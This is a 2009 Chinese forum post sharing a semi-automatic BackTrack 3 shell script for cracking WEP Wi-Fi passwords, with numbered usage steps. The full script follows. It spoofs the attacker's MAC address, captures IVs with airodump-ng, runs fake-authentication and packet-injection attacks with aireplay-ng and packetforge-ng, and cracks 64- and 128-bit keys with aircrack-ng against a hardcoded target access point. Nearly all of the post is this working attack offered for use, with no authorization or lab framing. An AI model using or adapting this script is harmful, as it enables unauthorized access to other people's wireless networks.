BT3方便破解半自动脚本
本帖最后由 dongfang1017 于 2009-9-22 15:27 编辑BT3方便破解半自动脚本
自己根据BT3教程做的破解WEP密码的shell
此shell提供给具有一定linux基础的人员使用。
使用方法:
1.查看附近有多少个活动的AP
./wep.sh 0
2.把查看好的频道/essid/mac地址修改进wep.sh文件的channel和ap_essid和ap_mac
然后用
./wep.sh 1
进行**
3.新开一个窗口使用
./wep.sh 2
进行注入测试
4.注入完成后使用
./wep.sh 3
进行注入,此时应该能看到步骤2开的窗口,这个要破解的ap种data在增长了
5.当data增长到了10000左右,新开一个窗口就可以用
./wep.sh 4
进行64位加密的wep密码破解了
如果data到了50000还没有破出来的话,再新开一个窗口使用
./wep.sh 44
进行128位加密的wep密码破解
内容如下:
#!/bin/sh
mkdir -p /mnt/crackwep
cd /mnt/crackwep
#rm /mnt/crackwep/*
eth=eth1
#my_mac=`ifconfig "$eth" |grep HWaddr|awk "{print $5}"`
my_mac="00:02:72:72:63:4C"
#my_mac="00:1E:4C:8A:62:5F"
macchanger --mac="$my_mac" "$eth"
name=crackcap
channel=1
ap_essid="dlink"
#ap_mac=`grep "$ap_essid" "$name"-01.txt |cut -d"," -f1`
ap_mac="00:17:9A:68:30:A1"
echo $1
if [ "$1" = 0 ];then
airmon-ng start "$eth"
airodump-ng "$eth"
fi
if [ "$1" = 1 ];then
echo airmon-ng start "$eth" "$channel"
echo airodump-ng --ivs -w "$name" -c "$channel" "$eth"
airmon-ng start "$eth" "$channel"
airodump-ng --ivs -w "$name" -c "$channel" "$eth"
fi
if [ "$1" = 2 ];then
echo aireplay-ng -1 0 -e "$ap_essid" -a "$ap_mac" -h "$my_mac" "$eth"
aireplay-ng -1 0 -e "$ap_essid" -a "$ap_mac" -h "$my_mac" "$eth"
fi
if [ "$1" = 03 ];then
echo aireplay-ng -3 -b "$ap_mac" -h "$my_mac" -x 1024 "$eth"
aireplay-ng -3 -b "$ap_mac" -h "$my_mac" -x 1024 "$eth"
fi
if [ "$1" = 3 ];then
rm *.xor
echo aireplay-ng -5 -b "$ap_mac" -h "$my_mac" "$eth"
aireplay-ng -5 -b "$ap_mac" -h "$my_mac" "$eth"
for xor in `ls *.xor`
do
echo packetforge-ng -0 -a "$ap_mac" -h "$my_mac" -k 255.255.255.255 -l 255.255.255.255 -y "$xor" -w mrarp
packetforge-ng -0 -a "$ap_mac" -h "$my_mac" -k 255.255.255.255 -l 255.255.255.255 -y "$xor" -w mrarp
done
echo aireplay-ng -2 -r mrarp -x 1024 "$eth"
aireplay-ng -2 -r mrarp -x 1024 "$eth"
fi
if [ "$1" = 30 ];then
echo aireplay-ng -2 -r mrarp -x 1024 "$eth"
aireplay-ng -2 -r mrarp -x 1024 "$eth"
fi
if [ "$1" = 4 ];then
echo aircrack-ng -n 64 -b "$ap_mac" *.ivs
aircrack-ng -n 64 -b "$ap_mac" *.ivs
fi
if [ "$1" = 44 ];then
echo aircrack-ng -n 128 -b "$ap_mac" *.ivs
aircrack-ng -n 128 -b "$ap_mac" *.ivs
fi
页:
[1]